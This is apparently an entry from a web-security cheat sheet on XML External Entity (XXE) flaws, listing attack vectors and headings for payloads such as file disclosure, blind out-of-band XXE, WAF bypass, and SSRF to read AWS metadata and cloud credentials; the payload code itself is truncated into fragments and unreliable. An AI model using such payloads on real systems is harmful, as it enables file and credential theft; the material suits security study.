High Severity | A05
📄 XML External Entity (XXE)
🧠Description
XXE vulnerabilities occur when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This can lead to SSRF, file disclosure, and remote code execution.
Attack Vectors:
- File Disclosure: Read local system files
- SSRF: Access internal services
- DoS: Billion laughs attack
- RCE: Via expect:// wrapper (PHP)
💣 Exploitation
# Basic XXE - File Disclosure ]>&xxe; # External Entity with CDATA ]> &file; # Blind XXE (OAST) ]> %xxe; # Parameter Entity for WAF bypass ]]>">]> %xxe;
🔄 XXE to SSRF
# AWS Metadata ]>&xxe; # Internal Port Scanning ]>&xxe; # Read cloud credentials ]>&xxe;